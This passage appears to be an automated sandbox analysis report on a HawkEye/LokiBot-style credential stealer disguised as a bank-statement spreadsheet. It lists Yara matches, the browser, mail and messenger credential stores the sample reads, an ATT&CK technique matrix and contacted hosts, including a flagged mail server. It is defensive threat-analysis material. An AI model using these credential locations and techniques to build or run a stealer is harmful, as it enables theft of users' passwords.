                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Yara detected MailPassView
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                Tries to steal Mail credentials (via file access)
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 6_2_00402D9A
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 6_2_00402D9A
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: ESMTPPassword 6_2_004033D7
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                Detected HawkEye Rat
                Source: BANK-STATMENT _xlsx.exe, String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                Source: BANK-STATMENT _xlsx.exe, String found in binary or memory: HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                Yara detected HawkEye Keylogger

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Replication Through Removable Media 1 | Windows Management Instrumentation 21 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 11 | Replication Through Removable Media 1 | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Native API 11 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 11 | Input Capture 221 | Peripheral Device Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Process Injection 512 | Obfuscated Files or Information 21 | Credentials in Registry 2 | Account Discovery 1 | SMB/Windows Admin Shares | Screen Capture 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 41 | Credentials In Files 1 | File and Directory Discovery 1 | Distributed Component Object Model | Email Collection 1 | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap |  | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | System Information Discovery 39 | SSH | Input Capture 221 | Data Transfer Size Limits | Non-Application Layer Protocol 2 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Query Registry 1 | VNC | Clipboard Data 3 | Exfiltration Over C2 Channel | Application Layer Protocol 13 | Jamming or Denial of Service |  | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Modify Registry 1 | DCSync | Security Software Discovery 1101 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 6 | Proc Filesystem | Virtualization/Sandbox Evasion 6 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 512 | /etc/passwd and /etc/shadow | Process Discovery 4 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
                Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Hidden Files and Directories 1 | Network Sniffing | Application Window Discovery 11 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
                Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Owner/User Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop
                Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | Remote System Discovery 1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS |  |  | Inhibit System Recovery
                Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Masquerade Task or Service | GUI Input Capture | System Network Configuration Discovery 1 | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy |  |  | Defacement

                Behavior Graph

                [Figure: behavior graph. Behavior Graph ID: 320625; Sample: BANK-STATMENT _xlsx.exe; Startdate: 19/11/2020; Architecture: WINDOWS; Score: 100]

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                BANK-STATMENT _xlsx.exe | 40% | Virustotal |
                BANK-STATMENT _xlsx.exe | 42% | ReversingLabs | Win32.Trojan.LokiBot
                BANK-STATMENT _xlsx.exe | 100% | Joe Sandbox ML |

                Dropped Files

                No Antivirus matches

                Unpacked PE Files


                Domains

                No Antivirus matches

                URLs


                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                whatismyipaddress.com | 104.16.154.36 | true | false |  | high
                mail.iigcest.com | 166.62.27.57 | true | true |  | unknown
                201.75.14.0.in-addr.arpa | unknown | unknown | true |  | unknown

                      Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://whatismyipaddress.com/ | false |  | high

                        URLs from Memory and Binaries

                                  • Avira URL Cloud: safe
                                  unknown
                                  http://fontfabrik.comBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/fontBANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.msn.com/de-ch/?ocid=iehpHLMEMhvbc.exe, 0000001A.00000002.838373686.0000000000758000.00000004.00000020.sdmpfalse
                                    high
                                    http://www.fontbureau.comcomBANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designersdBANK-STATMENT _xlsx.exe, 00000001.00000003.676177368.0000000005121000.00000004.00000001.sdmpfalse
                                      high
                                      http://whatismyipaddress.com/-BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.galapagosdesign.com/DPleaseBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/)BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/jp/NBANK-STATMENT _xlsx.exe, 00000001.00000003.672193622.00000000050FB000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://login.yahoo.com/config/loginBANK-STATMENT _xlsx.exe, vbc.exefalse
                                          high
                                          http://www.fonts.comBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.jiyu-kobo.co.jp/NormBANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.sandoll.co.krBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.site.com/logs.phpBANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cnZBANK-STATMENT _xlsx.exe, 00000001.00000003.669162564.0000000005122000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.urwpp.deDPleaseBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.nirsoft.net/BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.zhongyicts.com.cnBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sakkal.comBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comueedBANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designerstBANK-STATMENT _xlsx.exe, 00000001.00000003.674765089.0000000005121000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cndBANK-STATMENT _xlsx.exe, 00000001.00000003.669404161.0000000005123000.00000004.00000001.sdmpfalse
                                                    unknown
                                                    https://whatismyipaddress.com/BANK-STATMENT _xlsx.exe, 0000001D.00000002.885555940.0000000002F14000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.apache.org/licenses/LICENSE-2.0BANK-STATMENT _xlsx.exe, 00000001.00000003.670079069.0000000005123000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.comBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.galapagosdesign.com/BANK-STATMENT _xlsx.exe, 00000001.00000003.678233333.00000000050FF000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://whatismyipaddress.comBANK-STATMENT _xlsx.exe, 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803423064.0000000002ED4000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.885555940.0000000002F14000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.fontbureau.comFBANK-STATMENT _xlsx.exe, 00000001.00000003.675782658.00000000050FF000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/SBANK-STATMENT _xlsx.exe, 00000001.00000003.678233333.00000000050FF000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.carterandcone.comcBANK-STATMENT _xlsx.exe, 00000001.00000003.670925242.00000000050FC000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.carterandcone.comTCBANK-STATMENT _xlsx.exe, 00000001.00000003.671889636.00000000050FB000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/NBANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://whatismyipaddress.comx&BANK-STATMENT _xlsx.exe, 0000000F.00000002.803423064.0000000002ED4000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.885555940.0000000002F14000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://go.microsoft.BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://whatismyipaddress.comBANK-STATMENT _xlsx.exe, 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.801748838.0000000002B0E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884820790.0000000002B4E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.fontbureau.com/designersnoBANK-STATMENT _xlsx.exe, 00000001.00000003.682397058.0000000005121000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.jiyu-kobo.co.jp/EBANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://contextual.media.net/vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpfalse
                                                                  high
                                                                  http://go.microsoft.LinkId=42127BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  http://www.jiyu-kobo.co.jp/jp/BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.comaBANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.comdBANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
